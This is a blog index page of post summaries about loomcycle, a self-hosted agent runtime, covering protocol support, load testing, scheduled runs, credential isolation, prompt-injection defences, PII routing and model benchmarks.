RFC G shipped this week. Loomcycle now speaks the Agent2Agent protocol on both sides: a served AgentCard at /.well-known/agent-card.json, three protocol bindings (REST, JSON-RPC, gRPC on loomcycle's existing gRPC server), signed cards over RFC 8785 JSON canonicalization, multi-tenant routing in three modes, and synthetic a2a__<peer>__<skill> tools that let loomcycle agents call external A2A peers. The most interesting engineering moment: the locked RFC's Decision 9 deferred TASK_STATE_INPUT_REQUIRED to v2 - implementation revealed our existing Interruption tool already was the human-in-the-loop primitive A2A needed, so we shipped the bridge instead of the deferral. Plus the bug story that pays for end-to-end integration tests: a parked-run lifetime defect from the SDK's per-request context cancel, caught by the whole-feature code review against the real a2a-go v2.3.1 server API, fixed with context.WithoutCancel + executor-owned cancel.
2026-05-29 · release note · ~6 min read

From Go-bundled to JSON-pluggable - and into Claude Code itself

A week ago, adding a new MCP server to loomcycle's catalog meant a Go PR, a recompile, and a binary release. Today it means dropping a JSON file in $LOOMCYCLE_MCP_RECIPES_ROOT. The catalog moved from code to data - and because we chose Claude Code's .mcp.json per-server JSON shape as the format, two further moves became obvious: loomcycle import claude-code walks a Claude Code repo's .claude/ tree and ingests it into loomcycle yaml (recipe-match by package, preserves operator names, default-deny substrate-field stubs), and today's release of claude-code-plugin-loomcycle closes the loop with six slash commands, four bundled skills, and two opt-in hooks - zero loomcycle-side code changes. From now on, loomcycle is usable end-to-end inside Claude Code as the agentic runtime.
2026-05-29 · landscape note · ~8 min read

Seven frameworks and the row that's missing

The 2026 agent-framework surveys (DSPy, Claude Agent SDK, OpenAI Agents SDK, CrewAI, Microsoft Agent Framework, LangGraph, Google ADK) rank seven contenders along durable execution, observability, multi-tenancy, sandboxing, and provider lock-in. The taxonomy is useful but shares a structural assumption that none of them names: the agent runtime lives either inside your application's process or inside the vendor's cloud. Loomcycle is the third shape - a single Go binary in a sidecar, on your infrastructure, owning the loop. Once the runtime moves out of the application, half the framework-by-framework gaps the surveys keep finding stop being gaps; they become consequences of where the runtime lives. The eighth row of the matrix, written out honestly.
2026-05-28 · substrate note · ~7 min read

Scheduled runs at 30,000 fires - and the double-fire we caught at the ceiling

v0.12.7 ships the second half of yesterday's twin-RFC pair - RFC E, ScheduleDef as a substrate primitive. Cron in yaml, sweeper fires real RunInputs, on_complete hooks deliver via channel / memory / MCP, per-user forks carry their own credentials map from RFC F. The compound stress test pushed it from 100 to 100,000 fires in one test process and surfaced a real double-fire race at x30,000: every schedule fired exactly twice because RecordResult took longer than the tick interval and the sweeper had no in-flight guard. Closed by a sync.Map tracker (PR #272); curve now linear through x50,000. Zero credential mismatches across 200,000+ MCP calls in the sweep.
2026-05-28 · hardening notes · ~10 min read

Reliable under stress, sustainable for hours: seven load experiments in two days

Yesterday's post ended on a promissory note - cluster, Linux, sustained. Two days, seven experiments, ~280,000 circuits later, this post cashes it. Single-binary Linux baseline (p99 = 4.0 s). The cluster's sharp r=2 → r=3 phase transition (p99 collapses 15× as the load splits below the per-replica saturation knee). Cross-replica cancel ack p99 = 130 ms (38× headroom). Crash reaper at T+20 s, stop_reason='replica_died' named in the data. Then 15 and 30 minutes of sustained load with zero drift - 109,000 circuits, ~180 runs/sec, load distributed across r=4 within 0.5 %. A capacity ramp perfectly linear to x5000 (slope: 16 s per +1000 circuits). A saturation ramp that finally named the keep-up boundary: between x6000 and x8000. Soft ceiling, not a cliff.
2026-05-28 · substrate note · ~6 min read

Three MCP tokens in one run - and the agent never sees a single one

JobEmber.ai's autonomous job-search agent needs three per-user bearer tokens in one run - a jobs API, the user's Slack, the user's Telegram. The v0.8.14 substrate carried one. Handing all three to the agent would leak them into transcripts, OTEL spans, sub-agent contexts, and any prompt-injectable tool result. The fix is the right kind of unsexy: a named credentials map at the wire, ${run.credentials.<name>} substitution at the HTTP boundary, zero agent-visible introspection surface. Shipped today (PR #262); the matching scheduled-runs RFC follows.
2026-05-27 · hardening notes · ~8 min read

15,000 agents on a synthetic provider - finding loomcycle's real ceiling

Yesterday's run starved on provider quota before it could find loomcycle's own limits. So we built a synthetic LLM provider - same wire shape, zero HTTP, zero quota, deterministic 429 injection - and pushed the substrate to 15,000 agent runs held live in memory, then 1,500 executing in parallel once we lifted the harness gate 10×: 5,000/5,000 complete, zero substrate errors, queue never saturated. Three real bugs found and fixed along the way - and the real bottleneck finally named: pgxpool size and per-op connection queueing, with three fix paths. Charts included.
2026-05-27 · architecture note · ~5 min read

Route agents by data sensitivity: local where it matters, cloud where it doesn't

The honest answer to "can we use agents on sensitive data?" isn't everything-local (quality collapse) or everything-cloud (residency violation) - it's routing by sensitivity. Pin sensitive-data agents to a local model so their data never leaves your box; route everything else to the best cloud model for the job. Per-agent provider policy, operator-controlled, shipped today. Residency you can prove with a packet capture beats a retention promise you have to trust.
2026-05-26 · hardening notes · ~5 min read

3000 agents + 2000 memories + 2000 channels in one stress test

100 users × 10 circuits - 7000 entities the v0.12.x substrate tracked cleanly. The agents themselves starved on provider capacity, because Anthropic and Ollama both cap parallel calls at roughly the number we needed at peak. Multi-provider fallback didn't fix it (correlated ceilings). Five real substrate bugs found and shipped the same day. The bottleneck moved from "loomcycle internals" to "upstream provider concurrency limits" - the result an agentic runtime is supposed to produce. Includes the recorded x1000 session.
2026-05-26 · release progress · ~6 min read

Multi-replica HA - the seven phases that get loomcycle close to v1.0

Seven phases over four weeks took loomcycle from a single-process binary to a multi-replica cluster: Postgres LISTEN/NOTIFY backplane, cluster-wide per-user fairness, cross-replica cancel + pause/resume, advisory-lock singleton sweepers, DB-backed session locks and hooks. Two-replica docker-compose demo ships in the repo. Not v1.0 yet - load testing and hardening still ahead - but the biggest step toward it.
2026-05-25 · release note · ~9 min read

What it took to make loomcycle a first-class n8n citizen

@loomcycle/n8n-nodes-loomcycle went from v1.0.0 to v1.2.0 in four days. Five cluster sub-nodes (including a LangChain Chat Model wired to loomcycle's gateway), two trigger nodes, six example workflows, six action nodes covering Run / Memory / Channel and the AgentDef / SkillDef / MCPServerDef substrate. Plus the Tools Agent integration saga - three patches into the @langchain/core/messages/ai.js:178 rejection trail, ending with a defence-in-depth synthetic tool_call_id at every wire boundary.
2026-05-24 · architecture note · ~6 min read

Becoming OpenAI-shaped without becoming OpenAI

Loomcycle grew an OpenAI-shaped front door this week. Three releases: POST /v1/_llm/chat (the loomcycle-native gateway, v0.11.0), POST /v1/chat/completions (the Chat Completions shim, v0.11.3), and POST /v1/embeddings (the Embeddings shim, v0.11.4). Every n8n Chat Model, LangChain consumer, RAG pipeline, and vector DB that defaults to OpenAI now works against your loomcycle. The interesting part is what the shim deliberately doesn't translate.
2026-05-23 · architecture note · ~8 min read

Scrubbing the model's incoming mail: a PostTool hook for WebFetch, WebSearch, and Brave

A content-level prompt-injection defence built outside the model. WebFetch, WebSearch, and Brave Search results now pass through a PostTool hook that scrubs sixteen injection patterns plus Cyrillic-homoglyph variants before reaching the agent's context. The interesting parts: LIFO ordering with url-discovery, fail_mode: closed, and the JSON-nesting bypass we shipped and closed within two hours.
2026-05-22 · architecture note · ~7 min read

When the agent is in one container and its definition is in another

The historical loomcycle pattern read .claude/agents/*.md off a shared filesystem checkout. That dies the moment the runtime and the app run in independent containers. We solved it with a substrate trio - AgentDef, SkillDef, MCPServerDef - each content-addressed by SHA-256 over a fixed set of fields, pushed at boot from the consumer's image, resolved through one canonical lookup. With the cleanup-PR story of why the hash had to move from consumer-side to server-side.
2026-05-19 · architecture note · ~7 min read

Even with no-training contracts, the LLM should never see your name

Anthropic's no-training tier is a promise about retention, not a reduction of what gets sent. We rebuilt the JobEmber.ai data path so identifying PII never reaches the LLM at all - placeholders for names, emails, phones, and addresses; server-side comparison for location preferences via a narrow MCP tool - and dropped Read and HTTP from every agent that didn't strictly need them.
2026-05-18 · architecture note · ~4 min read

What tools should an agent reading attacker HTML get? None.

Companion piece to the PII post. The job-posting-parser agent runs against attacker-controllable third-party HTML and was built for the smallest-possible blast radius: zero tools, zero secrets, tag-wrapped inputs, Zod-strict output. Each invariant covers a different failure mode; none is sufficient alone. Frames a future deep-dive on content-level prompt-injection defence.
2026-05-17 · architecture note · ~6 min read

Who decides which URLs an agent can visit? It's not the runtime.

A Sunday-afternoon production-deploy test caught a structural gap: agents that find URLs via WebSearch can't fetch them, because the URL allowlist is pre-enumerated and discovery isn't. The runtime doesn't have the context to make the per-URL call - only the consumer service does. We extended Pre-hooks with per-call host widening (v0.8.17), moving the decision out of loomcycle while keeping the security boundary intact.
2026-05-15 · benchmarks · ~4 min read

The final bench scoreboard - 25 models, $21.92, all CAPABLE

Sweep #6 with v3 cases + multi-judge consensus across three provider families. Every model passed. The real signal moved to cost-per-pass and overall-pass count. ollama/deepseek-v4-pro topped both quality (0.91 semantic) and price ($0.0022/pass) - beating opus at 1/75 the cost. Anthropic models are now the three most expensive in the 25-model field.
2026-05-14 · benchmarks · ~8 min read

How we selected agent- and tool-capable models with our own benchmark

We ran a benchmark sweep across five providers to find models suitable for agentic tool-calling - and discovered, four sweeps in, that the bench harness itself had a bug invalidating most of our conclusions. Here's what we learned, what the corrected findings actually say, and what's going into v2 of the bench.
2026-05-12 · war story · ~7 min read

Our MCP server authenticated everyone as me

We added MCP to fix one auth leak - typed schemas, bearer tokens out of the model's view - and quietly created another. The shared developer bearer that authorized our MCP server resolved every user's agent calls to my user_id. Documents got linked to the wrong user. The bug took a stretch of days and a persistent second user to find. Here's the story and the per-run bearer mechanism (v0.8.14) that fixed it.
2026-05-07 · war story · ~6 min read

How I burned $80 on Claude Code in a Sunday afternoon

A parallel-spawn loop. 100 claude code --print instances. MacBook Pro M1 fan at maximum. My ANTHROPIC_API_KEY inherited via execve. Opus 4.7 on a dumb classification task. The bill: $80. Anthropic's robot denied reimbursement. The architectural lesson became loomcycle.

⌁ RSS feed